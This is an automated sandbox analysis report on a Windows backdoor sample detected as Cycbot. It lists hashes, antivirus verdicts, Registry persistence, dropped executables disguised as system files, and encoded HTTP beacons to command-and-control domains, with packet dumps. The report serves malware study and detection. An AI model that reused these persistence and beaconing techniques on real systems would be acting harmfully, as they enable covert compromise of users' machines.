Analysis Date2014-06-15 05:30:43
MD50a3be38fdfe8ee0179cebc7587d053c4
SHA1cab49291f7cca8b38f9c524200562fa461c3f274

Static Details:

File typePE32 executable for MS Windows (GUI) Intel 80386 32-bit
Section.text md5: 95e7ae106295c89327306d9e9cadf768 sha1: d272960ad0ee0ec0c51da124bbbec6819331ebf0 size: 126464
Section.tls md5: fd741c0b7cf7ad4d72a86811e63fc897 sha1: a83156a4744fd7842471a6ccbc7254fa59f3d5d7 size: 1536
Section.data md5: ea732ec8d0160f0cab77df15bb448ffa sha1: 767f2319ec677088e4e4abb1e0117d6c4229767a size: 79360
Section.reloc md5: 7467696cc84a8a1f782ddc53ae06f897 sha1: cfa6a44cec46461ba0e3eac7502ed42c050dea31 size: 1024
Timestamp2005-10-13 14:21:19
PEhash9fd67284bad1f02ac9d27df88439cf0df685a6d9
IMPhashc1aacef925a1da4fa8605b05ce84a075
AV360 SafeGen:Heur.Conjar.9
AVAd-AwareGen:Heur.Conjar.9
AVAlwil (avast)Cybota [Trj]
AVArcabit (arcavir)no_virus
AVAuthentiumW32/Goolbot.K.gen!Eldorado
AVAvira (antivir)TR/Crypt.ZPACK.Gen
AVCA (E-Trust Ino)Win32/FakeAlert.J!generic
AVCAT (quickheal)Backdoor.Cycbot.B
AVClamAVTrojan.Gbot-1944
AVDr. WebBackDoor.Gbot.70
AVEmsisoftGen:Heur.Conjar.9
AVEset (nod32)Win32/Kryptik.SEA
AVFortinetW32/Kryptik.SMY!tr.bdr
AVFrisk (f-prot)W32/Goolbot.K.gen!Eldorado (generic, not disinfectable)
AVF-SecureGen:Heur.Conjar.9
AVGrisoft (avg)Win32/Cryptor
AVIkarusBackdoor.Win32.Cycbot
AVKasperskyTrojan.Win32.Generic
AVMalwareBytesBackdoor.Bot
AVMcafeeBackDoor-EXI.gen.k
AVMicrosoft Security EssentialsBackdoor:Win32/Cycbot.G
AVMicroWorld (escan)Gen:Heur.Conjar.9
AVNormanwin32/Cycbot.ED
AVRisingno_virus
AVSophosTroj/Bdoor-BCX
AVSymantecBackdoor.Cycbot!gen5
AVTrend MicroBKDR_CYCBOT.SME3
AVVirusBlokAda (vba32)BScope.Trojan.MTA.01544

Runtime Details:

Screenshot

Process
↳ C:\malware.exe

RegistryHKEY_CURRENT_CONFIG\Software\Microsoft\windows\CurrentVersion\Internet Settings\ProxyEnable ➝
1
RegistryHKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows\Load ➝
C:\Documents and Settings\Administrator\Local Settings\Temp\csrss.exe
Creates FileC:\Documents and Settings\Administrator\Local Settings\History\History.IE5\index.dat
Creates FileC:\Documents and Settings\Administrator\Cookies\index.dat
Creates FilePIPE\lsarpc
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temp\csrss.exe
Creates File\Device\Afd\Endpoint
Creates FileC:\Documents and Settings\Administrator\Application Data\75DE.FFC
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\index.dat
Creates ProcessC:\Documents and Settings\Administrator\Application Data\dwm.exe
Creates ProcessC:\malware.exe startC:\Documents and Settings\Administrator\Application Data\Microsoft\conhost.exe%C:\Documents and Settings\Administrator\Application Data\Microsoft
Creates ProcessC:\malware.exe startC:\Documents and Settings\Administrator\Application Data\dwm.exe%C:\Documents and Settings\Administrator\Application Data
Creates Mutex{4D92BB9F-9A66-458f-ACA4-66172A7016D4}
Creates MutexWininetConnectionMutex
Creates Mutexc:!documents and settings!administrator!cookies!
Creates Mutex{61B98B86-5F44-42b3-BCA1-33904B067B81}
Creates Mutex{F053D246-5CC9-46E9-9C51-723D87E9990B}
Creates Mutex{0ECE180F-6E9E-4FA6-A154-6876D9DB8906}
Creates Mutexc:!documents and settings!administrator!local settings!history!history.ie5!
Creates Mutex{5D92BB9F-9A66-458f-ACA4-66172A7016D4}
Creates Mutex{B16C7E24-B3B8-4962-BF5E-4B33FD2DFE78}
Creates Mutex{B37C48AF-B05C-4520-8B38-2FE181D5DC78}
Creates Mutexc:!documents and settings!administrator!local settings!temporary internet files!content.ie5!
Winsock DNSwwwmediaportal.com
Winsock DNSgreenherbalteaonline.com
Winsock DNS127.0.0.1

Process
↳ C:\malware.exe startC:\Documents and Settings\Administrator\Application Data\dwm.exe%C:\Documents and Settings\Administrator\Application Data

Creates ProcessC:\Documents and Settings\Administrator\Application Data\dwm.exe

Process
↳ C:\malware.exe startC:\Documents and Settings\Administrator\Application Data\Microsoft\conhost.exe%C:\Documents and Settings\Administrator\Application Data\Microsoft

Creates ProcessC:\Documents and Settings\Administrator\Application Data\Microsoft\conhost.exe

Process
↳ C:\Documents and Settings\Administrator\Application Data\Microsoft\conhost.exe

Network Details:

DNSgreenherbalteaonline.com
Type: A
208.73.211.177
DNSgreenherbalteaonline.com
Type: A
208.73.211.182
DNSgreenherbalteaonline.com
Type: A
208.73.211.236
DNSgreenherbalteaonline.com
Type: A
208.73.211.249
DNSgreenherbalteaonline.com
Type: A
208.73.211.164
DNSzonedg.com
Type: A
208.73.211.175
DNSzonedg.com
Type: A
208.73.211.168
DNSzonedg.com
Type: A
208.73.211.165
DNSzonedg.com
Type: A
208.73.210.218
DNSzonedg.com
Type: A
208.73.210.215
DNSwwwmediaportal.com
Type: A
DNScalaculat.com
Type: A
HTTP GEThttp://greenherbalteaonline.com/images/greenherbalteagirlholdingcup250.gif?v3=98&tq=gJ4WK%2FSUh%2FTNhRMw9YLJ%2BMSTUivqg4b0zZtEfqHXarVJ%2BQhhAAQ%3D
User-Agent: mozilla/2.0
HTTP POSThttp://zonedg.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMf1kX%2BP9h%2BI0sDkX9PiwrWL2GUr0%2BbGpfvRsX%2BaIwb51gW1f447GrXf0eU2S%2BsSodOFuTLiv0agDh2xP6PLEqwaCGkrl%2F7LdBPNpPpTuxq00sD0OpLjRqAOhLgjh88y%2BcoJsX%2BSNxFKv975Xlm5G
User-Agent: mozilla/2.0
HTTP POSThttp://zonedg.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMf1kX%2BP9h%2BI0sDkX9PiwrWL2GUr0%2BbGpfvRsX%2BaIwb51gW1f447GrXf0eU2S%2BsSodOFuTLiv0agDh2xP6PLEqwaCGkrl%2F7LdBPNpPpTuxq00sD0OpLjRqAOhLgjh%2FMe%2BcoJuX%2BSNxFKv975Xlm5G
User-Agent: mozilla/2.0
HTTP POSThttp://zonedg.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMf1kX%2BP9h%2BI0sDkX9PiwrWL2GUr0%2BbGpfvRsX%2BaIwb51gW1f447GrXf0eU2S%2BsSodOFuTLiv0agDh2xP6PLEqwaCGkrl%2F7LdBPNpPpTuxq00sD0OpLjRqAOhLgjh88BSr%2Fe%2BV5ZuRg%3D%3D
User-Agent: mozilla/2.0
HTTP POSThttp://zonedg.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMf1kX%2BP9h%2BI0sDkX9PiwrWL2GUr0%2BbGpfvRsX%2BaIwb51gW1f447GrXf0eU2S%2BsSodOFuTLiv0agDh2xP6PLEqwaCGkrl%2F7LdBPNpPpTuxq00sD0OpLjRqAOhLgjh8sG%2BcoJsX%2BSNwlKv975Xlm5G
User-Agent: mozilla/2.0
Flows TCP192.168.1.1:1031 ➝ 208.73.211.177:80
Flows TCP192.168.1.1:1032 ➝ 208.73.211.175:80
Flows TCP192.168.1.1:1033 ➝ 208.73.211.175:80
Flows TCP192.168.1.1:1034 ➝ 208.73.211.175:80
Flows TCP192.168.1.1:1035 ➝ 208.73.211.175:80

Raw Pcap
0x00000000 (00000)   47455420 2f696d61 6765732f 67726565   GET /images/gree
0x00000010 (00016)   6e686572 62616c74 65616769 726c686f   nherbalteagirlho
0x00000020 (00032)   6c64696e 67637570 3235302e 6769663f   ldingcup250.gif?
0x00000030 (00048)   76333d39 38267471 3d674a34 574b2532   v3=98&tq=gJ4WK%2
0x00000040 (00064)   46535568 25324654 4e68524d 7739594c   FSUh%2FTNhRMw9YL
0x00000050 (00080)   4a253242 4d535455 69767167 3462307a   J%2BMSTUivqg4b0z
0x00000060 (00096)   5a744566 71485861 72564a25 32425168   ZtEfqHXarVJ%2BQh
0x00000070 (00112)   68414151 25334420 48545450 2f312e30   hAAQ%3D HTTP/1.0
0x00000080 (00128)   0d0a436f 6e6e6563 74696f6e 3a20636c   ..Connection: cl
0x00000090 (00144)   6f73650d 0a486f73 743a2067 7265656e   ose..Host: green
0x000000a0 (00160)   68657262 616c7465 616f6e6c 696e652e   herbalteaonline.
0x000000b0 (00176)   636f6d0d 0a416363 6570743a 202a2f2a   com..Accept: */*
0x000000c0 (00192)   0d0a5573 65722d41 67656e74 3a206d6f   ..User-Agent: mo
0x000000d0 (00208)   7a696c6c 612f322e 300d0a0d 0a         zilla/2.0....

0x00000000 (00000)   504f5354 202f696e 6465782e 68746d6c   POST /index.html
0x00000010 (00016)   3f74713d 674b5930 73486f4c 374c2532   ?tq=gKY0sHoL7L%2
0x00000020 (00032)   424e3679 4c68627a 36323773 48644d66   BN6yLhbz627sHdMf
0x00000030 (00048)   316b5825 32425039 68253242 49307344   1kX%2BP9h%2BI0sD
0x00000040 (00064)   6b583950 69777257 4c324755 72302532   kX9PiwrWL2GUr0%2
0x00000050 (00080)   42624770 66765273 58253242 61497762   BbGpfvRsX%2BaIwb
0x00000060 (00096)   35316757 31663434 37477258 66306555   51gW1f447GrXf0eU
0x00000070 (00112)   32532532 4273536f 644f4675 544c6976   2S%2BsSodOFuTLiv
0x00000080 (00128)   30616744 68327850 36504c45 71776143   0agDh2xP6PLEqwaC
0x00000090 (00144)   476b726c 25324637 4c644250 4e705070   Gkrl%2F7LdBPNpPp
0x000000a0 (00160)   54757871 30307344 304f704c 6a527141   Tuxq00sD0OpLjRqA
0x000000b0 (00176)   4f684c67 6a683838 79253242 636f4a73   OhLgjh88y%2BcoJs
0x000000c0 (00192)   58253242 534e7846 4b763937 35586c6d   X%2BSNxFKv975Xlm
0x000000d0 (00208)   35472048 5454502f 312e310d 0a486f73   5G HTTP/1.1..Hos
0x000000e0 (00224)   743a207a 6f6e6564 672e636f 6d0d0a55   t: zonedg.com..U
0x000000f0 (00240)   7365722d 4167656e 743a206d 6f7a696c   ser-Agent: mozil
0x00000100 (00256)   6c612f32 2e300d0a 436f6e74 656e742d   la/2.0..Content-
0x00000110 (00272)   4c656e67 74683a20 300d0a43 6f6e6e65   Length: 0..Conne
0x00000120 (00288)   6374696f 6e3a2063 6c6f7365 0d0a0d0a   ction: close....
0x00000130 (00304)                                         

0x00000000 (00000)   504f5354 202f696e 6465782e 68746d6c   POST /index.html
0x00000010 (00016)   3f74713d 674b5930 73486f4c 374c2532   ?tq=gKY0sHoL7L%2
0x00000020 (00032)   424e3679 4c68627a 36323773 48644d66   BN6yLhbz627sHdMf
0x00000030 (00048)   316b5825 32425039 68253242 49307344   1kX%2BP9h%2BI0sD
0x00000040 (00064)   6b583950 69777257 4c324755 72302532   kX9PiwrWL2GUr0%2
0x00000050 (00080)   42624770 66765273 58253242 61497762   BbGpfvRsX%2BaIwb
0x00000060 (00096)   35316757 31663434 37477258 66306555   51gW1f447GrXf0eU
0x00000070 (00112)   32532532 4273536f 644f4675 544c6976   2S%2BsSodOFuTLiv
0x00000080 (00128)   30616744 68327850 36504c45 71776143   0agDh2xP6PLEqwaC
0x00000090 (00144)   476b726c 25324637 4c644250 4e705070   Gkrl%2F7LdBPNpPp
0x000000a0 (00160)   54757871 30307344 304f704c 6a527141   Tuxq00sD0OpLjRqA
0x000000b0 (00176)   4f684c67 6a682532 464d6525 3242636f   OhLgjh%2FMe%2Bco
0x000000c0 (00192)   4a755825 3242534e 78464b76 39373558   JuX%2BSNxFKv975X
0x000000d0 (00208)   6c6d3547 20485454 502f312e 310d0a48   lm5G HTTP/1.1..H
0x000000e0 (00224)   6f73743a 207a6f6e 6564672e 636f6d0d   ost: zonedg.com.
0x000000f0 (00240)   0a557365 722d4167 656e743a 206d6f7a   .User-Agent: moz
0x00000100 (00256)   696c6c61 2f322e30 0d0a436f 6e74656e   illa/2.0..Conten
0x00000110 (00272)   742d4c65 6e677468 3a20300d 0a436f6e   t-Length: 0..Con
0x00000120 (00288)   6e656374 696f6e3a 20636c6f 73650d0a   nection: close..
0x00000130 (00304)   0d0a203c 703e4e6f 20737563 68206669   .. <p>No such fi
0x00000140 (00320)   6c65206f 72206469 72656374 6f72792e   le or directory.
0x00000150 (00336)   3c2f703e 0a20203c 6872202f 3e0a2020   </p>.  <hr />.  
0x00000160 (00352)   3c616464 72657373 3e4d6963 726f736f   <address>Microso
0x00000170 (00368)   66742d49 49532f37 2e303c2f 61646472   ft-IIS/7.0</addr
0x00000180 (00384)   6573733e 0a20203c 2f626f64 793e0a3c   ess>.  </body>.<
0x00000190 (00400)   2f68746d 6c3e0a                       /html>.

0x00000000 (00000)   504f5354 202f696e 6465782e 68746d6c   POST /index.html
0x00000010 (00016)   3f74713d 674b5930 73486f4c 374c2532   ?tq=gKY0sHoL7L%2
0x00000020 (00032)   424e3679 4c68627a 36323773 48644d66   BN6yLhbz627sHdMf
0x00000030 (00048)   316b5825 32425039 68253242 49307344   1kX%2BP9h%2BI0sD
0x00000040 (00064)   6b583950 69777257 4c324755 72302532   kX9PiwrWL2GUr0%2
0x00000050 (00080)   42624770 66765273 58253242 61497762   BbGpfvRsX%2BaIwb
0x00000060 (00096)   35316757 31663434 37477258 66306555   51gW1f447GrXf0eU
0x00000070 (00112)   32532532 4273536f 644f4675 544c6976   2S%2BsSodOFuTLiv
0x00000080 (00128)   30616744 68327850 36504c45 71776143   0agDh2xP6PLEqwaC
0x00000090 (00144)   476b726c 25324637 4c644250 4e705070   Gkrl%2F7LdBPNpPp
0x000000a0 (00160)   54757871 30307344 304f704c 6a527141   Tuxq00sD0OpLjRqA
0x000000b0 (00176)   4f684c67 6a683838 42537225 32466525   OhLgjh88BSr%2Fe%
0x000000c0 (00192)   32425635 5a755267 25334425 33442048   2BV5ZuRg%3D%3D H
0x000000d0 (00208)   5454502f 312e310d 0a486f73 743a207a   TTP/1.1..Host: z
0x000000e0 (00224)   6f6e6564 672e636f 6d0d0a55 7365722d   onedg.com..User-
0x000000f0 (00240)   4167656e 743a206d 6f7a696c 6c612f32   Agent: mozilla/2
0x00000100 (00256)   2e300d0a 436f6e74 656e742d 4c656e67   .0..Content-Leng
0x00000110 (00272)   74683a20 300d0a43 6f6e6e65 6374696f   th: 0..Connectio
0x00000120 (00288)   6e3a2063 6c6f7365 0d0a0d0a 72633d22   n: close....rc="
0x00000130 (00304)   696e7465 726e6574 2e676966 223e0a20   internet.gif">. 
0x00000140 (00320)   203c2f62 6f64793e 0a3c2f68 746d6c3e    </body>.</html>
0x00000150 (00336)   0a                                    .

0x00000000 (00000)   504f5354 202f696e 6465782e 68746d6c   POST /index.html
0x00000010 (00016)   3f74713d 674b5930 73486f4c 374c2532   ?tq=gKY0sHoL7L%2
0x00000020 (00032)   424e3679 4c68627a 36323773 48644d66   BN6yLhbz627sHdMf
0x00000030 (00048)   316b5825 32425039 68253242 49307344   1kX%2BP9h%2BI0sD
0x00000040 (00064)   6b583950 69777257 4c324755 72302532   kX9PiwrWL2GUr0%2
0x00000050 (00080)   42624770 66765273 58253242 61497762   BbGpfvRsX%2BaIwb
0x00000060 (00096)   35316757 31663434 37477258 66306555   51gW1f447GrXf0eU
0x00000070 (00112)   32532532 4273536f 644f4675 544c6976   2S%2BsSodOFuTLiv
0x00000080 (00128)   30616744 68327850 36504c45 71776143   0agDh2xP6PLEqwaC
0x00000090 (00144)   476b726c 25324637 4c644250 4e705070   Gkrl%2F7LdBPNpPp
0x000000a0 (00160)   54757871 30307344 304f704c 6a527141   Tuxq00sD0OpLjRqA
0x000000b0 (00176)   4f684c67 6a683873 47253242 636f4a73   OhLgjh8sG%2BcoJs
0x000000c0 (00192)   58253242 534e776c 4b763937 35586c6d   X%2BSNwlKv975Xlm
0x000000d0 (00208)   35472048 5454502f 312e310d 0a486f73   5G HTTP/1.1..Hos
0x000000e0 (00224)   743a207a 6f6e6564 672e636f 6d0d0a55   t: zonedg.com..U
0x000000f0 (00240)   7365722d 4167656e 743a206d 6f7a696c   ser-Agent: mozil
0x00000100 (00256)   6c612f32 2e300d0a 436f6e74 656e742d   la/2.0..Content-
0x00000110 (00272)   4c656e67 74683a20 300d0a43 6f6e6e65   Length: 0..Conne
0x00000120 (00288)   6374696f 6e3a2063 6c6f7365 0d0a0d0a   ction: close....
0x00000130 (00304)   0d0a203c 703e4e6f 20737563 68206669   .. <p>No such fi
0x00000140 (00320)   6c65206f 72206469 72656374 6f72792e   le or directory.
0x00000150 (00336)   3c2f703e 0a20203c 6872202f 3e0a2020   </p>.  <hr />.  
0x00000160 (00352)   3c616464 72657373 3e4d6963 726f736f   <address>Microso
0x00000170 (00368)   66742d49 49532f37 2e303c2f 61646472   ft-IIS/7.0</addr
0x00000180 (00384)   6573733e 0a20203c 2f626f64 793e0a3c   ess>.  </body>.<
0x00000190 (00400)   2f68746d 6c3e0a                       /html>.


Strings
j..
...*j.
.
..
.
n.F.a.@
W..
 @
y.).3
.
6p..+
.
0N.S
080904b0
1.0.0.1
1318
&All Exit        Shift+C
&exit
FileVersion
PrivateBuild
ProductVersion
StringFileInfo
Translation
VarFileInfo
VS_VERSION_INFO
|.` "`
 >-&@`
], `.`
*  /0<
~!04Oc
<0gZo5L
12IIh8
1]SPNO
1vcHnq
2-@*!)
2$*FAQ
2T"@`m
2u$` jB
2@y|X;
3(4Ee7
3L,@MJb
-3>qp}
3|W6WtlC
41;pzq
46nSUjU@
4.``)Hn
5[BI98
 `5I~$
-6+0Y6Z
 @6fZU"@@l
 6i6pT
^6k}v0t
6.)P+C
6SqA5HO
6Wh38Z
 :>>=7
77J,Oh
7#8t( 
	7e. ~9
7$` |M9'L
^7q6S#)\1
)%(+8|
@`82#6 
 @<!83bU
8_57'r
8)+/El?
8h\TQ	
 @8p#0
8*`@!qb
8{){S<
8sHn<N^G
8Z#7tc
8:ZL#{
93R@w`
9FHI{Ld
9Kw,@`
a6fC=h
^A%.-a
a?Aw:f,`
a@>}cQ
ad]10FE&9
ADVAPI32.dll
`agj7E
a^h3	;
@As @ 
aX;jM(
B, `	<
B9W{<	#(
Bd6yM 
bQ5SE*
By]2+.$
]#|Bz\e
?Bzqn!
+.,!@c
c2TzE5K
'C ` 8Fu
c9:;z-N
.capQP
cc.@ w
  C^~D{
`@cfy9
C\_+jPTV
CoCreateInstance
CopyFileW
CreateDirectoryExA
CreateEventW
CreateProcessW
;cSckrN
@csRCv^
CsS8gT
C @@yfA
[cY$kY
  =d|%
@.data
DeleteFileA
DeleteFileW
>Dm+=4
'_DQrj
D;Sz{t
d /`TU
 DV. `I84
D^$wR!
,(E40b
#_eD7z-
E ``@il
e>J!{}
E\%MbZ
EnumResourceNamesW
E-@`oL
e{[Pq,
ER6DAa'
Evv,i.
  evy0h
eZ<PvW
$]]eZvrw
`&@`f&
Fe189X
fef#K.
f-(` f
F(g S2d
FindClose
FindFirstFileA
FindNextFileA
FPXHO*
fr9o0mx
f=sRAM
ft?{KWnT
!	?f+w
`F&` Y
_|g)<*
" @G.@ 
{G;!`_=
@ ,@ G. @
g0NZwS
`:gaQ3
~G&`@B1
  gec]E
GetExitCodeThread
GetFileAttributesA
GetModuleBaseNameW
GetTempPathA
GF]3IP
Gf|dTK
ghifmf
|g]Ku?
@]GlJ>
?G @@n
G" `Sf
g!.W)2
{&  h	
Heap32ListNext
HeapSetInformation
hiwmE1
?)H)oKz~
:HpBah!
hPeTv9
hpMR7>
HQFG=c
,H$|rJR
]>HVS8n"
(@ i" 
I6e*bRC
;:IG.`
IIB_ridE
IIDFromString
ily,``
+\iM(`@g
InterlockedCompareExchange
ip<|,@@
,%iR1RD/?
 IvaWo
IV~W/t
i,xm#a
$``iz(
J3[&`@
J]el~D
$ @'/j[j
J)PO]D
jt9>2}
 jU1.`
&j@WI]
k_2p#l&
KERNEL32.dll
kFn%{'o}f
Kk%TgFK
)k%mPW
k#o ``
'+KP5C
KSUYX@A
)K=;%W( @
k%$  x
l @`& 
#l=	^5D
l /C;=
'\lEAt
 @lN:Y
LoadLibraryExW
LoadLibraryW
LocalAlloc
LocalFree
lpM;V)6
LRrK%g
lstrcmpA
lstrcmpiA
lstrcmpiW
lstrlenA
lstrlenW
l{w\#\
lZh!q.
M4yGfW
MEZ>YFB
Mfzct:
|]'%MP
MultiByteToWideChar
MV&@@.
M Y36&
)^M=yZ
 mzrZ@
$`@=_\n
$ `n4-kWZ]
N( `5XR
:nd(` 
NjfcWM
],"NL\"
~?n@rvo
n(UaX7
Nv+MP]
nWd-cI
o0"2F4
# O%}9
oaXH=z(Se
<O>;n%
o'rC{n
o@uWun
O->Wy1S
`P8d9o
{PdF3OF;/*
pk~mF!(
PSAPI.DLL
@PwOAY
PxT?3=
pz%bwws
|Q^.(}
q<)\0RG
q1sH3TS
\q:Ag>
-qFh+B
+qJ	bb
q?LyQ0
qn'B<}
 !QQ	['\^
QS:o{$;2
Q^t[a':r
qU#qv:
QysC6WXQ
r_3@Hc
r `9u'
RCemYsO
R:%DuJ
RegCloseKey
RegCreateKeyA
RegCreateKeyExW
RegCreateKeyW
RegDeleteKeyW
RegDeleteValueW
RegEnumValueW
RegOpenKeyExA
RegOpenKeyExW
RegQueryValueExA
RegQueryValueExW
RegSetValueExA
.reloc
RemoveDirectoryA
r}Fe^Y
rmcMa:
r	~OPE
rPt"xD
` -Rw	
r!wPC_FO9
Rxx'0D
's3\!L	X
SbEmVgm
sbR+G?
	s$`@CV
SetFileAttributesA
SetProcessWorkingSetSize
sJ".^H
S%N!flx
`S#qjmW
&,sx|R#
+t^2#uL.
T5w:96
T;6N=a
T-EyAb
tfyzwY|
!This program cannot be run in DOS mode.
Tjxpgv
tK(@a^
?TMkiY
>"Tout~
T`pV(<
@T, @sn
\)T wk
T z\.^
{-`Tz@>AX
"  U @@
``.@`U5wD
U6v'PM
UbqJ@#7
$ue7o6
U*@ex^
@ ]'UK
>UU"`@
"uu+`U
V0.@@Z
vAn?^"
VFLof,
v:i& `\V
vOmI[zsgN
	V'_:@p
Vqz~5@
"vuZ-f
VvcKxt
VV'H\]c
vVQ3<C0
V/zL%h
	&``w{
.   ``W@
-w4[v*
w+	f-e
WideCharToMultiByte
@wKF`<jP
?WS{+Pe
-w+|t"
`| ``*` X
X6w<a[
-X]Drw)
x"&i!2V
x	LFQQ
XonwF{!
y&5K[pyUR`
y%=e8y
y`egB/
Y:nb'|:0
<[Z1TF
>)Z7ZM
>\&z!9c
Z]=\ab
Z{$@`d
z/_eH;
` zF4{
z{H/`1\
zmv?PU
^Zp,q@
ZQ$LY9
z|/#R4
ZtQ~"%: